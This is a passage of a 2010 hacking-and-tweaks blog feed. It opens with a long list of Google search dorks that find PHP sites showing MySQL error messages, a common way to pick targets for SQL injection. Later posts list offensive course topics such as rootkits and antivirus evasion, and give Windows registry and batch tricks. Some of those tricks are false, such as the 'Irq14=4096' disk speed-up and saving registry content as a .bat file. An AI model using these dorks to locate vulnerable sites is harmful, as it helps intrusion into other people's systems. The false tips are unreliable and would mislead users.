/&gt;inurl:article.php?id=&lt;br /&gt;inurl:person.php?id=&lt;br /&gt;inurl:productinfo.php?id=&lt;br /&gt;inurl:showimg.php?id=&lt;br /&gt;inurl:view.php?id=&lt;br /&gt;inurl:website.php?id=&lt;br /&gt;inurl:hosting_info.php?id=&lt;br /&gt;inurl:gallery.php?id=&lt;br /&gt;inurl:rub.php?idr=&lt;br /&gt;inurl:view_faq.php?id=&lt;br /&gt;inurl:artikelinfo.php?id=&lt;br /&gt;inurl:detail.php?ID=&lt;br /&gt;inurl:index.php?=&lt;br /&gt;inurl:profile_view.php?id=&lt;br /&gt;inurl:category.php?id=&lt;br /&gt;inurl:publications.php?id=&lt;br /&gt;inurl:fellows.php?id=&lt;br /&gt;inurl:downloads_info.php?id=&lt;br /&gt;inurl:prod_info.php?id=&lt;br /&gt;inurl:shop.php?do=part&amp;amp;id=&lt;br /&gt;inurl:productinfo.php?id=&lt;br /&gt;inurl:collectionitem.php?id=&lt;br /&gt;inurl:band_info.php?id=&lt;br /&gt;inurl:product.php?id=&lt;br /&gt;inurl:releases.php?id=&lt;br /&gt;inurl:ray.php?id=&lt;br /&gt;inurl:produit.php?id=&lt;br /&gt;inurl:pop.php?id=&lt;br /&gt;inurl:shopping.php?id=&lt;br /&gt;inurl:productdetail.php?id=&lt;br /&gt;inurl:post.php?id=&lt;br /&gt;inurl:viewshowdetail.php?id=&lt;br /&gt;inurl:clubpage.php?id=&lt;br /&gt;inurl:memberInfo.php?id=&lt;br /&gt;inurl:section.php?id=&lt;br /&gt;inurl:theme.php?id=&lt;br /&gt;inurl:page.php?id=&lt;br /&gt;inurl:shredder-categories.php?id=&lt;br /&gt;inurl:tradeCategory.php?id=&lt;br /&gt;inurl:product_ranges_view.php?ID=&lt;br /&gt;inurl:shop_category.php?id=&lt;br /&gt;inurl:transcript.php?id=&lt;br /&gt;inurl:channel_id=&lt;br /&gt;inurl:item_id=&lt;br /&gt;inurl:newsid=&lt;br /&gt;inurl:trainers.php?id=&lt;br /&gt;inurl:news-full.php?id=&lt;br /&gt;inurl:news_display.php?getid=&lt;br /&gt;inurl:index2.php?option=&lt;br /&gt;inurl:readnews.php?id=&lt;br /&gt;inurl:top10.php?cat=&lt;br /&gt;inurl:newsone.php?id=&lt;br /&gt;inurl:event.php?id=&lt;br /&gt;inurl:product-item.php?id=&lt;br /&gt;inurl:sql.php?id=&lt;br /&gt;inurl:aboutbook.php?id=&lt;br /&gt;inurl:preview.php?id=&lt;br /&gt;inurl:loadpsb.php?id=&lt;br /&gt;inurl:pages.php?id=&lt;br /&gt;inurl:material.php?id=&lt;br /&gt;inurl:clanek.php4?id=&lt;br /&gt;inurl:announce.php?id=&lt;br /&gt;inurl:chappies.php?id=&lt;br /&gt;inurl:read.php?id=&lt;br /&gt;inurl:viewapp.php?id=&lt;br /&gt;inurl:viewphoto.php?id=&lt;br /&gt;inurl:rub.php?idr=&lt;br /&gt;inurl:galeri_info.php?l=&lt;br /&gt;inurl:review.php?id=&lt;br /&gt;inurl:iniziativa.php?in=&lt;br /&gt;inurl:curriculum.php?id=&lt;br /&gt;inurl:labels.php?id=&lt;br /&gt;inurl:story.php?id=&lt;br /&gt;inurl:look.php?ID=&lt;br /&gt;inurl:newsone.php?id=&lt;br /&gt;inurl:aboutbook.php?id=&lt;br /&gt;inurl:material.php?id=&lt;br /&gt;inurl:opinions.php?id=&lt;br /&gt;inurl:announce.php?id=&lt;br /&gt;inurl:rub.php?idr=&lt;br /&gt;inurl:galeri_info.php?l=&lt;br /&gt;inurl:tekst.php?idt=&lt;br /&gt;inurl:newscat.php?id=&lt;br /&gt;inurl:newsticker_info.php?idn=&lt;br /&gt;inurl:rubrika.php?idr=&lt;br /&gt;inurl:rubp.php?idr=&lt;br /&gt;inurl:offer.php?idf=&lt;br /&gt;inurl:art.php?idm=&lt;br /&gt;inurl:title.php?id=&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"id=" &amp;amp; intext:"Warning: mysql_fetch_assoc()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: mysql_fetch_array()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: mysql_num_rows()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: session_start()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: getimagesize()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: is_writable()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: getimagesize()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: Unknown()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: session_start()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: mysql_result()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: pg_exec()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: mysql_result()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: mysql_num_rows()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: mysql_query()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: array_merge()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: preg_match()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: ilesize()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: filesize()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: filesize()&lt;br /&gt;inurl:"id=" &amp;amp; intext:"Warning: require()&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-5339645321511997577?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/5339645321511997577/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/some-sql-dorks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5339645321511997577'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5339645321511997577'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/some-sql-dorks.html' title='SOME SQL DORKS'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-1043535641526134700</id><published>2010-08-01T08:18:00.001-07:00</published><updated>2010-08-01T08:18:57.757-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ETHICAl'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Ethical Hacking Symbols</title><content type='html'>• Security testing methodologies&lt;br /&gt;&lt;br /&gt;• The Ethical Hacking Profession&lt;br /&gt;&lt;br /&gt;• Passive Intelligence Gathering – 2007 Version&lt;br /&gt;&lt;br /&gt;• Network Sweeps&lt;br /&gt;&lt;br /&gt;• Stealthily Network Recon&lt;br /&gt;&lt;br /&gt;• Passive traffic identification&lt;br /&gt;&lt;br /&gt;• Identifying system vulnerabilities&lt;br /&gt;&lt;br /&gt;• Abusing Domain Name System (DNS)&lt;br /&gt;&lt;br /&gt;• Abusing Simple Network Management Protocol&lt;br /&gt;(SNMP)&lt;br /&gt;&lt;br /&gt;• Introduction to Remote Exploits&lt;br /&gt;&lt;br /&gt;• Engineering remote exploits&lt;br /&gt;&lt;br /&gt;• Running shellcode in RAM vs. on disk&lt;br /&gt;&lt;br /&gt;• Heap Buffer Overflows&lt;br /&gt;&lt;br /&gt;• Compromising Windows 2003 Server Systems&lt;br /&gt;&lt;br /&gt;• Compromising Solaris Unix and Linux Systems&lt;br /&gt;&lt;br /&gt;• Attacking RDP (Remote Desktop Protocol) in&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Windows XP, 2003 &amp;amp; Vista&lt;br /&gt;• Windows password weaknesses &amp;amp; Rainbow Tables&lt;br /&gt;&lt;br /&gt;• Unix password weaknesses&lt;br /&gt;&lt;br /&gt;• Attacking Cisco’s IOS password weaknesses&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Trojan genres&lt;br /&gt;• Windows, Unix and Linux Trojans&lt;br /&gt;&lt;br /&gt;• Kernel Mode Windows Rootkits – System Call&lt;br /&gt;Hijacking and Direct Kernel Object Modification&lt;br /&gt;&lt;br /&gt;• Kernel Mode Linux Rootkits&lt;br /&gt;&lt;br /&gt;• Covert communication channels&lt;br /&gt;&lt;br /&gt;• Spoofing endpoints of communication tunnels&lt;br /&gt;&lt;br /&gt;• Tunneling through IPSec VPNs by abusing ESP&lt;br /&gt;&lt;br /&gt;• Steganographic Tunnels&lt;br /&gt;&lt;br /&gt;• Remote command execution&lt;br /&gt;&lt;br /&gt;• Sniffing and hijacking SSL encrypted sessions&lt;br /&gt;&lt;br /&gt;• Installing sniffers on low privilege account in&lt;br /&gt;Windows 2003 Server&lt;br /&gt;&lt;br /&gt;• Stealthy Remote keylogger installation&lt;br /&gt;• Circumventing Antivirus&lt;br /&gt;Modifying syslog entries&lt;br /&gt;• Raw binary editing to prevent forensic&lt;br /&gt;investigations&lt;br /&gt;• Editing the Windows Event Log&lt;br /&gt;• Abusing Windows Named Pipes for Domain&lt;br /&gt;Impersonation&lt;br /&gt;• Impersonation of other Users- Hijacking kernel&lt;br /&gt;tokens&lt;br /&gt;• Disguising network connections&lt;br /&gt;• Attacking Cisco IOS&lt;br /&gt;• Attacking STP &amp;amp; BGP protocols&lt;br /&gt;• Wireless Insecurity&lt;br /&gt;• Breaking Wireless Security – WEP, WPA, WPA2&lt;br /&gt;• Blinding IDS &amp;amp; IPS&lt;br /&gt;• Attacking IDS &amp;amp; IPS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Malicious event log editing&lt;br /&gt;• Binary filesystem modification for anti-forensics&lt;br /&gt;• Named Pipe abuse&lt;br /&gt;• Kernel Token Hijacking&lt;br /&gt;• Attacking Border Gateway Protocol (BGP)&lt;br /&gt;• Attack WEP&lt;br /&gt;• Cracking WPA&lt;br /&gt;• Cracking WPA2&lt;br /&gt;• Cisco IOS Exploits&lt;br /&gt;• Breaking into Cisco routers&lt;br /&gt;• Blinding IPS&lt;br /&gt;• Attacking IPS&lt;br /&gt;&lt;br /&gt;Abusing Web Applications&lt;br /&gt;• Attacking Java Applets&lt;br /&gt;• Breaking web app authentication&lt;br /&gt;• SQL Injection techniques&lt;br /&gt;• Modifying form data&lt;br /&gt;• Attacking session IDs&lt;br /&gt;• Cookie stealing&lt;br /&gt;• Cross Site Scripting&lt;br /&gt;• Cross Site Request Forgery (CSRF) Attacks&lt;br /&gt;&lt;br /&gt;Remote buffer overflow exploit lab&lt;br /&gt;• Custom compiling Shellcode&lt;br /&gt;• Running payloads in RAM&lt;br /&gt;• Hiding exploit payloads in jpeg and gif image&lt;br /&gt;files&lt;br /&gt;• Attacking email vectors (Lotus Notes and&lt;br /&gt;Microsoft Exchange, and Outlook Web Access)&lt;br /&gt;• Registry manipulation&lt;br /&gt;• Client side IE &amp;amp; Firefox exploits&lt;br /&gt;• Using custom Trojans to circumvent Antivirus&lt;br /&gt;• Remote kernel overflows&lt;br /&gt;• RDP (Remote Desktop Protocol) Exploitation&lt;br /&gt;• Cracking Windows Passwords&lt;br /&gt;• Building Rainbow Tables&lt;br /&gt;• Cracking Windows 2003 native mode passwords&lt;br /&gt;• Brute forcing salted Unix passwords&lt;br /&gt;• Attacking Kerberos Pre-Auth Hashes&lt;br /&gt;• Cracking IOS and PIX passwords&lt;br /&gt;• Compromise a DMZ setting with port redirection&lt;br /&gt;• Circumvent firewall IP access list (ACL)&lt;br /&gt;• Customizing Trojans to avoid Antivirus&lt;br /&gt;• Deploying kernel mode rootkits on Windows 2003&lt;br /&gt;&amp;amp; Vista&lt;br /&gt;• Installing LKM rootkits on Linux servers&lt;br /&gt;• Hijacking MSN messenger traffic&lt;br /&gt;• Running commands remotely&lt;br /&gt;• Breaking wireless encryption – WEP, WPA, WPA2&lt;br /&gt;• Installing sniffers in low privilege user accounts&lt;br /&gt;• Sniffing remotely and retrieving results&lt;br /&gt;• Remote keylogging&lt;br /&gt;• Tunneling with cover channels through IPSec VPNs&lt;br /&gt;• Hijack and capture SSL traffic&lt;br /&gt;&lt;br /&gt;Network Sweeping&lt;br /&gt;• Scanning from spoofed IP addresses&lt;br /&gt;• Stealthy Recon&lt;br /&gt;• Injecting p0f for passive OS fingerprinting&lt;br /&gt;• Scanning through firewalls&lt;br /&gt;• IPv6 Scanning&lt;br /&gt;• Discover all subdomains owned by an&lt;br /&gt;organization&lt;br /&gt;• Inspect changes to whois record over last 3&lt;br /&gt;years&lt;br /&gt;• Windows 2003 Server &amp;amp; Vista DNS Cache&lt;br /&gt;Poisoning Attacks&lt;br /&gt;• Pumping SNMP for data – OID Dissection&lt;br /&gt;• Attacking SNMP&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-1043535641526134700?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/1043535641526134700/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/ethical-hacking-symbols.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1043535641526134700'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1043535641526134700'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/ethical-hacking-symbols.html' title='Ethical Hacking Symbols'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-7213144842996272808</id><published>2010-08-01T08:01:00.001-07:00</published><updated>2010-08-01T08:01:36.910-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>HOW TO HIDE FOLDER</title><content type='html'>Suppose you want to lock the folder games in d: which has the path D:\GamesIn the same drive create a text file and type&lt;br /&gt;ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}&lt;br /&gt;Now save this text file as loc.bat&lt;br /&gt;&lt;br /&gt;create another text file and type in it&lt;br /&gt;ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games&lt;br /&gt;Now save this text file as key.bat&lt;br /&gt;&lt;br /&gt;Now you can see 2 batch files loc and key.Press loc and the folder games will change to control panel and you cannot view its contents.Press key and you will get back your original folde&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-7213144842996272808?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/7213144842996272808/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-hide-folder.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/7213144842996272808'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/7213144842996272808'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-hide-folder.html' title='HOW TO HIDE FOLDER'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-617641262433629211</id><published>2010-08-01T07:16:00.000-07:00</published><updated>2010-08-01T07:18:01.656-07:00</updated><title type='text'>HOW TO HIDE DRIVE</title><content type='html'>1) Go to Start -&gt; Run -&gt; “regedit” without quotes&lt;br /&gt;2) Navigate following&lt;br /&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer&lt;/span&gt;&lt;br /&gt;3) Choose Edit -&gt; New -&gt; DWORD Value and give name NoDrives.&lt;br /&gt;4) Double click NoDrives and determine which drive that you want to vanish in Value Data.&lt;br /&gt;&lt;br /&gt;Example: If you wish to vanish drive E:, insert value 16 in Value Data.&lt;br /&gt;&lt;br /&gt;The combination value in “Value Data” are as following:&lt;br /&gt;A: &gt; 1&lt;br /&gt;B: &gt; 2&lt;br /&gt;C: &gt; 4&lt;br /&gt;D: &gt; 8&lt;br /&gt;E: &gt; 16&lt;br /&gt;F: &gt; 32&lt;br /&gt;G: &gt; 64&lt;br /&gt;H: &gt; 128&lt;br /&gt;I: &gt; 256&lt;br /&gt;J: &gt; 512&lt;br /&gt;K: &gt; 1024&lt;br /&gt;L: &gt; 2048&lt;br /&gt;M: &gt; 4096&lt;br /&gt;All: &gt; 67108863&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-617641262433629211?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/617641262433629211/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-hide-drive.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/617641262433629211'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/617641262433629211'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-hide-drive.html' title='HOW TO HIDE DRIVE'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-1828453346016801288</id><published>2010-08-01T07:13:00.000-07:00</published><updated>2010-08-01T07:14:59.143-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='harddisk'/><title type='text'>INCREASE YOUR HARDDISC SPEED</title><content type='html'>1. Run&lt;span style="color: rgb(51, 102, 255);"&gt; SYSEDIT.EXE&lt;/span&gt; from the start.&lt;br /&gt;2. Expand the system.ini file window.&lt;br /&gt;3.  find a line called [386enh].&lt;br /&gt;4. Press Enter to make one blank line, and in that line type&lt;br /&gt;5. Irq14=4096 (note: This line IS CASE SENSITIVE)&lt;br /&gt;6. Click on the File menu, then choose Save.&lt;br /&gt;7. Close SYSEDIT and reboot your computer.&lt;br /&gt;8. Restart windows!&lt;br /&gt;&lt;br /&gt;Speed will increase when u reboot computer! ! !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-1828453346016801288?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/1828453346016801288/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/increase-your-harddisc-speed.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1828453346016801288'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1828453346016801288'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/increase-your-harddisc-speed.html' title='INCREASE YOUR HARDDISC SPEED'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-5037825949634542587</id><published>2010-08-01T07:03:00.000-07:00</published><updated>2010-08-01T07:06:58.593-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='iCON'/><title type='text'>REPAIR ICON VIEW</title><content type='html'>______________________________________________________________________&lt;br /&gt;&lt;pre style="margin-top: 0pt; display: inline; color: rgb(51, 102, 255);"&gt;Windows Registry Editor Version 5.00&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Control Panel\desktop\WindowMetrics]&lt;br /&gt;"Shell Icon BPP"="16"&lt;br /&gt;"Shell Icon Size"="32"&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows&lt;br /&gt;\CurrentVersion\Policies\Explorer]&lt;br /&gt;"NoSaveSettings"=dword:00000000&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;______________________________________________________________________&lt;br /&gt;save above in notepas as anything.bat and run&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-5037825949634542587?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/5037825949634542587/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/repair-icon-view.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5037825949634542587'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5037825949634542587'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/repair-icon-view.html' title='REPAIR ICON VIEW'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6312349295737791482</id><published>2010-08-01T04:47:00.001-07:00</published><updated>2010-08-01T04:49:26.764-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='pendrive'/><title type='text'>HOW TO DISABLE PENDRIVE</title><content type='html'>How to disable Pendrive??&lt;br /&gt;Procedure to be follow :-&lt;br /&gt;Open notepad and paste this code then save it with anything.reg&lt;br /&gt;Then double click on it, computer will ask Are you sure you want to add the information to registry?click YES.&lt;br /&gt;&lt;br /&gt;_____________________________________________________________&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Windows Registry Editor Version 5.00&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR]&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Start”=dword:00000004&lt;/span&gt;&lt;br /&gt;________________________________________________________________&lt;br /&gt;Enable:-&lt;br /&gt;And if you want to reverse it change the value “00000004″ to “00000003″. The computer will show pendrive again !!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6312349295737791482?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6312349295737791482/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-disable-pendrive.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6312349295737791482'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6312349295737791482'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-disable-pendrive.html' title='HOW TO DISABLE PENDRIVE'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-721759187779657444</id><published>2010-08-01T04:42:00.000-07:00</published><updated>2010-08-01T04:44:16.001-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='d'/><title type='text'>Set ur jpg image as a background inside the folders</title><content type='html'>First create a file in drive named &lt;span style="color: red;"&gt;&lt;span style="font-family: Verdana;"&gt;desktop.ini&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;then open it in notepad and insert below lines&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: rgb(51, 102, 255);" class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;[{BE098140-A513-11D0-A3A4-00C04FD706EC}]&lt;br /&gt;iconarea_image=path&lt;br /&gt;iconarea_text=0x00ffffff&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Replace path with your jpg,bmp image path&lt;br /&gt;&lt;br /&gt;&lt;ul style="margin-top: 0pt; margin-bottom: 0pt;"&gt;&lt;li&gt;iconarea_text=0x00ffffff is for text color&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;0x00ffffff is for white color&lt;br /&gt;0x00000000 is for black color&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NOTE :- don't edit [{BE098140-A513-11D0-A3A4-00C04FD706EC}]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If you need your drive back as default just delete the desktop.ini&lt;br /&gt;&lt;br /&gt;remember it is not working for folders&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-721759187779657444?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/721759187779657444/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/set-ur-jpg-image-as-background-inside.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/721759187779657444'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/721759187779657444'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/set-ur-jpg-image-as-background-inside.html' title='Set ur jpg image as a background inside the folders'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-2871059245333787304</id><published>2010-08-01T00:41:00.000-07:00</published><updated>2010-08-01T01:38:07.218-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='pc'/><title type='text'>CLEANYOUR PC USING BATCH FILES</title><content type='html'>_____________________________________________________________________________________________________--&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;@echo off&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;if %username% == Administrator.WINDOWS goto admin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;REM ** Delete User Files **&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Recent"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temp"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\History\History.ie5"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temporary Internet Files\content.ie5"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;goto end&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;:admin&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;REM ** Do some extra stuff here **&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;REM ** What ever you want..... **&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;ECHO You are a Administrator&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Recent"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temp"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local 